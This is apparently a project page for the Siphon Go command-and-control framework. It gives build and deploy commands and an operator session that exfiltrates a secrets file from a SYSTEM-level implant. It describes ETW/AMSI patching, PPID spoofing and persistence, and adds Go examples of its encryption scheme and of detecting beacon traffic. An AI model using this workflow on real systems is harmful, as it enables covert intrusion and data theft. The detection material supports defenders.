C2 with forward secrecy

Lightweight command-and-control framework built in Go. Per-session ECDH P-256 key exchange, AES-256-GCM authenticated encryption, and uTLS Chrome fingerprinting.

siphon-server
$ make setup && make server && make implant SERVER_PK=<hex>
generating ECDH P-256 keypair...
generating self-signed TLS certificate...
server  build/siphon-server (linux/amd64, stripped)
implant build/siphon-implant.exe (windows/amd64)

$ ./build/siphon-server -listen :443 -auth secret
listening on :443

siphon> implants
  abc123  10.10.10.5  Windows 10  SYSTEM  5s
siphon> interact abc123
siphon(abc123)> cmd whoami
nt authority\system

Key exchange   ECDH P-256
Encryption     AES-256-GCM
Fingerprint    uTLS Chrome
Dependencies   0

Built for red team operations

Forward secrecy per session. Authenticated encryption on every payload. Encrypted loot at rest. Zero config files on disk.

ECDH Forward Secrecy

Ephemeral ECDH P-256 key exchange per session. Server public key embedded at build time via ldflags. Shared secrets zeroed after derivation. No config files touch disk.

$ make implant SERVER_PK=04a1b2... C2_HOST=https://10.0.0.5:443
public key embedded via -ldflags
implant build/siphon-implant.exe (windows/amd64)
ECDH curve: P-256

AES-256-GCM Transport

Authenticated encryption for all payloads. Unique nonce per message. A separate HMAC-SHA256 covers the full envelope (ID, PubKey, Nonce, Ciphertext), so the metadata around the ciphertext is authenticated as well as the ciphertext itself.
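To make concrete what the two sections above describe (an ephemeral ECDH P-256 agreement per session, AES-256-GCM with a fresh nonce per message, and a separate HMAC-SHA256 over the envelope fields), here is an added illustration in Go using only the standard library. It is not Siphon's code: the key derivation (SHA-256 with a label, where HKDF would be the production choice), the field layout of the Envelope struct, the use of the ID as GCM associated data, and the names Seal, Open, RoundTrip, sessionCipher and envelopeMAC are all assumptions made for this example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Envelope mirrors the fields the page lists (ID, PubKey, Nonce, Ciphertext) plus the
// HMAC-SHA256 over them; the exact layout is an assumption made for this example.
type Envelope struct {
	ID         string
	PubKey     []byte // initiator's ephemeral P-256 public key (uncompressed point)
	Nonce      []byte // 12-byte GCM nonce, fresh for every message
	Ciphertext []byte // AES-256-GCM output with the 16-byte tag appended
	MAC        []byte
}

// sessionCipher derives the AES-256-GCM AEAD and the HMAC key from a raw shared secret,
// then zeroes the secret. SHA-256 with a label stands in for HKDF (assumption).
func sessionCipher(shared []byte) (cipher.AEAD, [32]byte, error) {
	encKey := sha256.Sum256(append([]byte("enc|"), shared...))
	macKey := sha256.Sum256(append([]byte("mac|"), shared...))
	for i := range shared { shared[i] = 0 } // shared secret is no longer needed
	block, err := aes.NewCipher(encKey[:])
	if err != nil { return nil, macKey, err }
	gcm, err := cipher.NewGCM(block)
	return gcm, macKey, err
}

// envelopeMAC covers every field except the MAC itself, so ID and PubKey are bound to the
// ciphertext even though GCM's tag only covers what is passed as associated data.
func envelopeMAC(key [32]byte, e *Envelope) []byte {
	h := hmac.New(sha256.New, key[:])
	for _, part := range [][]byte{[]byte(e.ID), e.PubKey, e.Nonce, e.Ciphertext} {
		h.Write(part)
	}
	return h.Sum(nil)
}

// Seal is the initiator side: fresh ephemeral key pair, ECDH against the responder's
// static public key, AES-256-GCM with the ID as associated data, then the outer HMAC.
func Seal(id string, responderPub *ecdh.PublicKey, plaintext []byte) (*Envelope, error) {
	eph, err := ecdh.P256().GenerateKey(rand.Reader)
	if err != nil { return nil, err }
	shared, err := eph.ECDH(responderPub)
	if err != nil { return nil, err }
	gcm, macKey, err := sessionCipher(shared)
	if err != nil { return nil, err }
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil { return nil, err }
	e := &Envelope{ID: id, PubKey: eph.PublicKey().Bytes(), Nonce: nonce}
	e.Ciphertext = gcm.Seal(nil, nonce, plaintext, []byte(id))
	e.MAC = envelopeMAC(macKey, e)
	return e, nil
}

// Open is the responder side: recompute the secret from the static private key and the
// ephemeral public key carried in the envelope, verify the HMAC first, then decrypt.
func Open(responderPriv *ecdh.PrivateKey, e *Envelope) ([]byte, error) {
	pub, err := ecdh.P256().NewPublicKey(e.PubKey)
	if err != nil { return nil, err }
	shared, err := responderPriv.ECDH(pub)
	if err != nil { return nil, err }
	gcm, macKey, err := sessionCipher(shared)
	if err != nil { return nil, err }
	if !hmac.Equal(e.MAC, envelopeMAC(macKey, e)) {
		return nil, errors.New("envelope MAC mismatch")
	}
	return gcm.Open(nil, e.Nonce, e.Ciphertext, []byte(e.ID))
}

// RoundTrip is a self-check: decryption works, two sessions to the same responder carry
// different ephemeral keys, and a single flipped ciphertext bit is rejected.
func RoundTrip() (bool, error) {
	responder, err := ecdh.P256().GenerateKey(rand.Reader)
	if err != nil { return false, err }
	msg := []byte("constructed sample payload")
	e1, err := Seal("abc123", responder.PublicKey(), msg)
	if err != nil { return false, err }
	e2, err := Seal("abc123", responder.PublicKey(), msg)
	if err != nil { return false, err }
	if out, err := Open(responder, e1); err != nil || !bytes.Equal(out, msg) {
		return false, errors.New("decryption failed")
	}
	if bytes.Equal(e1.PubKey, e2.PubKey) {
		return false, errors.New("ephemeral key reused across sessions")
	}
	e1.Ciphertext[0] ^= 0x01 // flip one bit; the HMAC check must reject it
	if _, err := Open(responder, e1); err == nil {
		return false, errors.New("tampered envelope accepted")
	}
	return true, nil
}

func main() {
	ok, err := RoundTrip()
	fmt.Println("round trip ok:", ok, "err:", err)
}
```

Two things are worth noticing when running it. RoundTrip checks that two sessions to the same responder carry different ephemeral public keys, which is what "per session" buys, and that flipping a single ciphertext bit is rejected at the HMAC before AES-GCM ever runs. That second check also shows the outer HMAC is belt and braces for the ciphertext, since the GCM tag alone would reject the change; what it adds is binding the ID and PubKey fields, which GCM only covers for data passed as associated data. One caveat about this construction as written here (not a statement about Siphon's implementation, which the page does not show): only the initiator's key is ephemeral, so anyone who later obtains the responder's static private key together with captured envelopes can recompute every past session key. Forward secrecy against that compromise needs an ephemeral key on the responder's side as well.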

uTLS Fingerprinting

Chrome JA3 fingerprint via HelloChrome_Auto. Cookie-based beacon transport blends with normal HTTPS traffic on standard endpoints.

Operator Console

Interactive CLI with Catppuccin Mocha palette. Prefix-match implant selection, task queuing, live result display, and encrypted loot storage.

14 commands

Implant Builder

Cross-compile Windows implants from Linux. Server public key, C2 host, sleep interval, auth token, kill date, and custom endpoints all configured via build variables. Stripped with -s -w -trimpath.

$ make implant SERVER_PK=04a1b2... C2_HOST=https://c2:443 SLEEP_SEC=10
GOOS=windows GOARCH=amd64
build/siphon-implant.exe (stripped, no debug)

Runtime Evasion

ETW and AMSI patching on startup. PPID spoofing under explorer.exe. CREATE_NO_WINDOW for stealth process creation.

Platform support

Server runs on Linux. Implant targets Windows with full evasion. Linux implant for testing.

Feature matrix (each entry rated Full, Windows Only, or Out of Scope): ECDH P-256, AES-256-GCM, uTLS Chrome, HMAC-SHA256, Beacon Transport, File Exfiltration, File Deployment, Encrypted Loot, Self-Destruct, Sleep Control, ETW Patching, AMSI Patching, PPID Spoofing, Registry Persist, Schtask Persist, Startup Persist, Kernel Evasion, Anti-Forensics.

Three-component design

Shared protocol types. Server with operator console. Implant with evasion and persistence. Build-time configuration via ldflags.

1. Shared Protocol

Common types for Beacon, Task, TaskResult, and Envelope. ECDH key exchange and AES-256-GCM encryption shared between server and implant.

2. C2 Server

HTTPS handlers for beacon and submit endpoints. Interactive operator console with Catppuccin Mocha palette. TLS certificate generation. Encrypted loot storage.

3. Implant

HTTPS client with uTLS Chrome fingerprint. Task dispatcher for cmd, upload, download, sleep, persist, and selfdestruct. ETW/AMSI patching and PPID spoofing on Windows.

4. Build System

Makefile targets for setup, server, implant, and implant-linux. Server public key, C2 host, and all config embedded at compile time via -ldflags.

Build and deploy

Generate keys, build the server, cross-compile the implant. Three make commands take you from a fresh checkout to an operational server and implant.

build.sh
$ git clone https://github.com/Real-Fruit-Snacks/Siphon.git
$ cd Siphon

# Generate ECDH keypair + TLS cert
$ make setup

# Build C2 server (Linux, stripped)
$ make server

# Build implant (Windows cross-compiled)
$ make implant SERVER_PK=<hex> C2_HOST=https://c2:443
operate.sh
# Start the C2 server
$ ./build/siphon-server -listen :443 -auth secret

# Interact with implants
siphon> implants
siphon> interact abc123
siphon(abc123)> cmd whoami
nt authority\system
siphon(abc123)> upload C:\secrets.db
saved loot/abc123/secrets.db (encrypted)

Know the boundaries

Evades

  • Passive TLS inspection — Chrome JA3 fingerprint
  • ETW tracing — EtwEventWrite patched
  • AMSI scanning — AmsiScanBuffer patched
  • Process ancestry — PPID spoofed under explorer.exe
  • Traffic analysis — cookie-based HTTPS beacons

Visible To

  • Kernel-level EDR/XDR — behavioral analysis
  • Network TLS inspection proxies — decrypted traffic
  • Memory forensics — RAM inspection
  • Full disk forensics — persistence artifacts
  • SELinux, AppArmor — mandatory access controls
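The two lists above are where a defender's opportunities lie, and a fixed sleep interval is one of them. As an added example that is not part of the Siphon project, the Go program below runs a simple beacon-timing check over a constructed proxy log (the hosts, addresses and log format are made up for the example): it groups connections by client and destination and flags pairs whose gaps between connections are nearly constant, which is exactly what an implant built with a fixed interval such as the SLEEP_SEC=10 build example produces, whether or not each request blends in as a cookie-carrying HTTPS GET. The names ParseLog and FindBeacons and the thresholds are assumptions of the example.

```go
package main

import (
	"bufio"
	"fmt"
	"math"
	"sort"
	"strings"
	"time"
)

// Conn is one proxy log record reduced to the fields the timing check needs.
type Conn struct {
	At       time.Time
	Src, Dst string
}

// Finding describes one (client, destination) pair whose connection timing is suspiciously regular.
type Finding struct {
	Src, Dst string
	Count    int
	MeanSec  float64 // average gap between consecutive connections
	CV       float64 // coefficient of variation of the gaps (stddev / mean); 0 means a fixed sleep
}

// SampleLog is a constructed proxy log: "<RFC3339 time> <client ip> <dest host:port> <method> <path>".
// 10.10.10.5 reaches c2.example.test every 10 s, like an implant built with SLEEP_SEC=10;
// 10.10.10.7 is ordinary browsing with irregular gaps. All hosts and addresses are made up.
var SampleLog = strings.TrimSpace(`
2024-03-01T10:00:00Z 10.10.10.5 c2.example.test:443 GET /api/v1
2024-03-01T10:00:03Z 10.10.10.7 www.example.test:443 GET /
2024-03-01T10:00:10Z 10.10.10.5 c2.example.test:443 GET /api/v1
2024-03-01T10:00:20Z 10.10.10.5 c2.example.test:443 GET /api/v1
2024-03-01T10:00:30Z 10.10.10.5 c2.example.test:443 GET /api/v1
2024-03-01T10:00:40Z 10.10.10.5 c2.example.test:443 GET /api/v1
2024-03-01T10:00:41Z 10.10.10.7 www.example.test:443 GET /news
2024-03-01T10:00:50Z 10.10.10.5 c2.example.test:443 GET /api/v1
2024-03-01T10:01:00Z 10.10.10.5 c2.example.test:443 GET /api/v1
2024-03-01T10:01:02Z 10.10.10.7 www.example.test:443 GET /news/1
2024-03-01T10:03:30Z 10.10.10.7 www.example.test:443 GET /search
2024-03-01T10:05:00Z 10.10.10.7 www.example.test:443 GET /
2024-03-01T10:09:12Z 10.10.10.7 www.example.test:443 GET /about
2024-03-01T10:09:13Z 10.10.10.7 www.example.test:443 GET /about/team
`)

// ParseLog reads the whitespace-separated format above; malformed lines are reported, not skipped silently.
func ParseLog(s string) ([]Conn, error) {
	var out []Conn
	sc := bufio.NewScanner(strings.NewReader(s))
	for n := 1; sc.Scan(); n++ {
		f := strings.Fields(sc.Text())
		if len(f) < 5 {
			return nil, fmt.Errorf("line %d: expected 5 fields, got %d", n, len(f))
		}
		t, err := time.Parse(time.RFC3339, f[0])
		if err != nil {
			return nil, fmt.Errorf("line %d: %w", n, err)
		}
		out = append(out, Conn{At: t, Src: f[1], Dst: f[2]})
	}
	return out, sc.Err()
}

// FindBeacons groups connections by (client, destination), computes the gaps between
// consecutive connections, and flags pairs with at least minCount connections whose gap
// CV is at most maxCV. A fixed sleep gives CV 0; jitter raises it, so maxCV trades
// false negatives against false positives. Results are sorted for deterministic output.
func FindBeacons(conns []Conn, minCount int, maxCV float64) []Finding {
	groups := map[[2]string][]time.Time{}
	for _, c := range conns {
		k := [2]string{c.Src, c.Dst}
		groups[k] = append(groups[k], c.At)
	}
	var findings []Finding
	for k, ts := range groups {
		if len(ts) < minCount {
			continue
		}
		sort.Slice(ts, func(i, j int) bool { return ts[i].Before(ts[j]) })
		var sum, sq float64
		gaps := make([]float64, len(ts)-1)
		for i := range gaps {
			gaps[i] = ts[i+1].Sub(ts[i]).Seconds()
			sum += gaps[i]
		}
		mean := sum / float64(len(gaps)) // NaN when there are no gaps, which never passes the CV test
		for _, g := range gaps {
			sq += (g - mean) * (g - mean)
		}
		if cv := math.Sqrt(sq/float64(len(gaps))) / mean; cv <= maxCV {
			findings = append(findings, Finding{k[0], k[1], len(ts), mean, cv})
		}
	}
	sort.Slice(findings, func(i, j int) bool { return findings[i].Src < findings[j].Src })
	return findings
}

func main() {
	conns, err := ParseLog(SampleLog)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	for _, f := range FindBeacons(conns, 5, 0.2) {
		fmt.Printf("%s -> %s: %d connections, mean gap %.1fs, CV %.2f\n", f.Src, f.Dst, f.Count, f.MeanSec, f.CV)
	}
}
```

With minCount 5 and maxCV 0.2 only the 10-second client is reported; the browsing host has seven connections too, but its gaps vary by an order of magnitude. Siphon's Sleep Control sets the interval, and if an implant adds jitter on top the CV rises, so in practice this check is combined with other signals (connection count over a long window, destination rarity, uniform request sizes) rather than used alone, and the threshold is tuned per environment.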